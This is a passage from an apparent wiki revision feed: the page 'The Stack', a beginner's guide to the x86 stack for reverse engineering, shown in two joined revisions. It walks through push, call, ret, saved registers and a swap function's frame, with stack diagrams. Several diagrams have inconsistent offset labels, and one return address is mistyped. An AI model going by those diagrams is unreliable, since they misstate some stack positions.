<td align='left' width='150'>esp + 8</td><br />
<td align='center' width='100'>param2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>param1</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan;'>'''''esp '''''</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center' style='color: green;'>(previous ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>esi (var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>edi (var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
0x401013 ret ; Return (eax isn't set, so there's no return value)<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 4</td><br />
<td align='center' width='100'>param2</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp'''''</td><br />
<td align='center'>param1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center' style='color: green;'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>(previous ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>esi (var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>edi (var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 28</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
0x400007 add esp, 8 ; Balance the stack<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp - 4</td><br />
<td align='center' width='100'>param2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>param1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>(previous ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>esi (var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>edi (var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 28</td><br />
<td align='center'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 32</td><br />
<td align='center'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 36</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
== Balance ==<br />
<br />
This should be rather obvious from the examples shown above, but it is worth paying special attention to.<br />
<br />
Every function should leave the stack pointer in the exact place it received it. In other words, every amount subtracted from the stack (either by sub or push) ''has to be added to the stack'' (either by add or pop). If it isn't, the return value won't be in the right place and the program will likely crash.<br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=The_Stack&diff=3136The Stack2012-01-15T23:40:43Z<p>Killboy: /* Frame Pointer */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
The stack is, at best, a difficult concept to understand. However, understanding the stack is essential to reverse engineering code. <br />
<br />
The stack register, esp, is basically a register that points to an arbitrary location in memory called "the stack". The stack is just a really big section of memory where temporary data can be stored and retrieved. When a function is called, some stack space is allocated to the function, and when a function returns the stack should be in the same state it started in. <br />
<br />
The stack always grows downwards, towards lower values. The esp register always points to the lowest value on the stack. Anything below esp is considered free memory that can be overwritten. <br />
<br />
The stack stores function parameters, local variables, and the return address of every function. <br />
<br />
== Function Parameters ==<br />
When a function is called, its parameters are typically stored on the stack before making the call. Here is an example of a function call in C:<br />
func(1, 2, 3); <br />
And here is the equivalent call in assembly:<br />
push 3<br />
push 2<br />
push 1<br />
call func<br />
add esp, 0Ch<br />
<br />
The parameters are put on the stack, then the function is called. The function has to know it's getting 3 parameters, which is why function parameters have to be declared in C. <br />
<br />
After the function returns, the stack pointer is still 12 bytes ahead of where it started. In order to restore the stack to where it used to be, 12 (0x0c) has to be added to the stack pointer. The three pushes, of 4 bytes each, mean that a total of 12 was subtracted from the stack. <br />
<br />
Here is what the initial stack looked like (with ?'s representing unknown stack values):<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>'''''esp'''''</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
Note that the same 5 32-bit stack values are shown in all these examples, with the stack pointer at the left moved. The stack goes much further up and down, but that isn't shown here. <br />
<br />
Here are the three pushes:<br />
<br />
<br />
<br />
push 3<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 4</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
push 2<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 8</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
push 1<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 12</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
Now all three values are on the stack, and esp is pointing at the 1. The function is called, and returns, leaving the stack the way it started. Now the final instruction runs:<br />
<br />
<br />
<br />
add esp, 0Ch<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>'''''esp'''''</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
Note that the 3, 2, and 1 are still on the stack. However, they're below the stack pointer, which means that they are considered free memory and will be overwritten.<br />
<br />
== call and ret Revisited ==<br />
<br />
The ''call'' instruction pushes the address of the next instruction onto the stack, then jumps to the specified function. <br />
<br />
The ''ret'' instruction pops the next value off the stack, which should have been put there by a call, and jumps to it. <br />
<br />
Here is some example code:<br />
0x10000000 push 3<br />
0x10000001 push 2<br />
0x10000002 push 1<br />
0x10000003 call 0x10000020<br />
0x10000007 add esp, 12<br />
0x10000011 exit ; This isn't a real instruction, but pretend it is<br />
0x10000020 mov eax, 1<br />
0x10000024 ret<br />
<br />
Now here is what the stack looks like at each step in this code:<br />
<br />
<br />
<br />
0x10000000 push 3<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 4</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x10000001 push 2<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 8</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x10000002 push 1<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 12</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x10000003 call 0x10000020<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 16</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>0x1000007</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x10000020 mov eax, 1<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 16</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>0x1000007</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x10000024 ret<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 12</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>0x1000007</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x10000007 add esp, 12<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>'''''esp'''''</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>0x1000007</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x10000011 exit ; This isn't a real instruction, but pretend it is<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>'''''esp'''''</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>0x1000007</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
Note the return address being pushed onto the stack by call, and being popped off the stack by ret.<br />
<br />
== Saved Registers ==<br />
Some registers (ebx, edi, esi, ebp) are generally considered to be non-volatile. What that means is that when a function is called, those registers have to be saved. Typically, this is done by pushing them onto the stack at the start of a function, and popping them in reverse order at the end. Here is a simple example:<br />
<br />
; function test()<br />
push esi<br />
push edi<br />
.....<br />
pop edi<br />
pop esi<br />
ret<br />
<br />
== Local Variables ==<br />
<br />
At the beginning of most functions, space to store local variables in is allocated. This is done by subtracting the total size of all local variables from the stack pointer at the start of the function, then referencing them based on the stack. An example of this will be demonstrated in the following section. <br />
<br />
== Frame Pointer ==<br />
The frame pointer is the final piece to the puzzle. Unless a program has been optimized, ebp is set to point at the beginning of the local variables. The reason for this is that throughout a function, the stack changes (due to saving variables, making function calls, and others reasons), so keeping track of where the local variables are relative to the stack pointer is tricky. The frame pointer, on the other hand, is stored in a non-volatile register, ebp, so it never changed during the function. <br />
<br />
Here is an example of a swap function that uses two parameters passed on the stack and a local variable to store the interim result (if you don't fully understand this, don't worry too much -- I don't either. IDA tends to look after this kind of stuff for you automatically, so this is more theory than actual useful information. Please note that the virtual memory addresses have been modified for simplicity, in reality the addresses would increase based on the size of the previous operation):<br />
<br />
<pre><br />
0x400000 push ecx ; A pointer to an integer in memory<br />
0x400001 push edx ; Another integer pointer<br />
0x400002 call 0x401000 ; Call the swap function<br />
0x400003 add esp, 8 ; Clear the stack<br />
.....<br />
0x401000 ; function swap(int *a, int *b)<br />
0x401000 push ebp ; Preserve ebp.<br />
0x401001 mov ebp, esp ; Set up the frame pointer.<br />
0x401002 sub esp, 8 ; Make room for two local variables.<br />
0x401003 push esi ; Preserve esi on the stack.<br />
0x401004 push edi ; Preserve edi on the stack.<br />
<br />
0x401005 mov ecx, [ebp+8] ; Put the first parameter (a pointer) into ecx.<br />
0x401006 mov edx, [ebp+12] ; Put the second parameter (a pointer) into edx.<br />
<br />
0x401007 mov esi, [ecx] ; Dereference the pointer to get the first parameter.<br />
0x401008 mov edi, [edx] ; Dereference the pointer to get the second parameter.<br />
<br />
0x401009 mov [ebp-4], esi ; Store the first as a local variable<br />
0x40100a mov [ebp-8], edi ; Store the second as a local variable<br />
<br />
0x40100b mov esi, [ebp-8] ; Retrieve them in reverse<br />
0x40100c mov edi, [ebp-4]<br />
<br />
0x40100d mov [ecx], edi ; Put the second value into the first address.<br />
0x40100e mov [edx], esi ; Put the first value into the second address.<br />
<br />
0x40100f pop edi ; Restore the edi register<br />
0x401010 pop esi ; Restore the esi register<br />
0x401011 add esp, 8 ; Remove the local variables from the stack<br />
0x401012 pop ebp ; Restore ebp<br />
0x401013 ret ; Return (eax isn't set, so there's no return value)<br />
</pre><br />
<br />
(You can download the complete code to test this example in Visual Studio [[Stack_Example|here]].)<br />
<br />
<br />
<br />
Because this is such a complicated example, it's valuable to go through it step by step, keeping track of the stack (again, if you use IDA, the stack variables will automatically be identified, but you should still understand how this works):<br />
<br />
Initial stack:<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp - 4</td><br />
<td align='center' width='100'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 28</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 32</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 36</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x400000 push ecx ; A pointer to an integer in memory<br />
0x400001 push edx ; Another integer pointer<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 4</td><br />
<td align='center' width='100' style='color: red;'>addressof(var1)</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp'''''</td><br />
<td align='center' style='color: red;'>addressof(var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 28</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x400002 call 0x401000 ; Call the swap function<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 8</td><br />
<td align='center' width='100'>addressof(var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>addressof(var2)</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp'''''</td><br />
<td align='center' style='color: red;'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x401000 ; function swap(int *a, int *b)<br />
0x401000 push ebp ; Preserve ebp.<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 12</td><br />
<td align='center' width='100'>addressof(var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8</td><br />
<td align='center'>addressof(var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp'''''</td><br />
<td align='center' style='color: red;'>(ebp's value)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x401001 mov ebp, esp ; Set up the frame pointer.<br />
0x401002 sub esp, 8 ; Make room for two local variables.<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 20</td><br />
<td align='center' width='100'>addressof(var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 16</td><br />
<td align='center'>addressof(var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: yellow'>esp + 8, '''''ebp'''''</td><br />
<td align='center'>(ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center' style='color: red;'>(unused)</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp'''''</td><br />
<td align='center' style='color: red;'>(unused)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x401003 push esi ; Preserve esi on the stack.<br />
0x401004 push edi ; Preserve edi on the stack.<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 28, ''ebp + 12''</td><br />
<td align='center' width='100'>addressof(var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 24, ''ebp + 8''</td><br />
<td align='center'>addressof(var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 20, ''ebp + 4''</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: yellow'>esp + 16, '''''ebp'''''</td><br />
<td align='center'>(ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12, ''ebp - 4''</td><br />
<td align='center'>(unused)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8, ''ebp - 8''</td><br />
<td align='center'>(unused)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4, ''ebp - 12''</td><br />
<td align='center' style='color: red;'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp''''', ''ebp - 16''</td><br />
<td align='center' style='color: red;'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4, ''ebp - 20''</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
Note how in the following section the variables are address based in the address of ebp. The first parameter is ebp + 8, which is 2 values above ebp on the stack, and the second is ebp + 12, which is 3 above ebp. Count them to confirm!<br />
<br />
0x401005 mov ecx, [ebp+8] ; Put the first parameter (a pointer) into ecx.<br />
0x401006 mov edx, [ebp+12] ; Put the second parameter (a pointer) into edx.<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 28, ''ebp + 12''</td><br />
<td align='center' width='100' style='color: green;'>addressof(var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 24, ''ebp + 8''</td><br />
<td align='center' style='color: green;'>addressof(var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 20, ''ebp + 4''</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: yellow'>esp + 16, '''''ebp'''''</td><br />
<td align='center'>(ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12, ''ebp - 4''</td><br />
<td align='center'>(unused)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8, ''ebp - 8''</td><br />
<td align='center'>(unused)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4, ''ebp - 12''</td><br />
<td align='center'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp''''', ''ebp - 16''</td><br />
<td align='center'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4, ''ebp - 20''</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
<br />
These lines don't use the stack, so the table will be omitted:<br />
0x401007 mov esi, [ecx] ; Dereference the pointer to get the first parameter.<br />
0x401008 mov edi, [edx] ; Dereference the pointer to get the second parameter.<br />
<br />
<br />
<br />
<br />
0x401009 mov [ebp-4], esi ; Store the first as a local variable<br />
0x40100a mov [ebp-8], edi ; Store the second as a local variable<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 28, ''ebp + 12''</td><br />
<td align='center' width='100'>addressof(var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 24, ''ebp + 8''</td><br />
<td align='center'>addressof(var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 20, ''ebp + 4''</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: yellow'>esp + 16, '''''ebp'''''</td><br />
<td align='center'>(ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12, ''ebp - 4''</td><br />
<td align='center' style='color: red;'>esi (var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8, ''ebp - 8''</td><br />
<td align='center' style='color: red;'>edi (var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4, ''ebp - 12''</td><br />
<td align='center'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp''''', ''ebp - 16''</td><br />
<td align='center'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4, ''ebp - 20''</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x40100b mov esi, [ebp-8] ; Retrieve them in reverse<br />
0x40100c mov edi, [ebp-4]<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 28, ''ebp + 12''</td><br />
<td align='center' width='100'>addressof(var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 24, ''ebp + 8''</td><br />
<td align='center'>addressof(var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 20, ''ebp + 4''</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: yellow'>esp + 16, '''''ebp'''''</td><br />
<td align='center'>(ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12, ''ebp - 4''</td><br />
<td align='center' style='color: green;'>esi (var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8, ''ebp - 8''</td><br />
<td align='center' style='color: green;'>edi (var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4, ''ebp - 12''</td><br />
<td align='center'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp''''', ''ebp - 16''</td><br />
<td align='center'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4, ''ebp - 20''</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
<br />
0x40100d mov [ecx], edi ; Put the second value into the first address.<br />
0x40100e mov [edx], esi ; Put the first value into the second address.<br />
0x40100f pop edi ; Restore the edi register<br />
0x401010 pop esi ; Restore the esi register<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 20, ''ebp + 12''</td><br />
<td align='center' width='100'>addressof(var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 16, ''ebp + 8''</td><br />
<td align='center'>addressof(var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12, ''ebp + 4''</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: yellow'>esp + 8, '''''ebp'''''</td><br />
<td align='center'>(ebp)</td><br />
</tr><br />
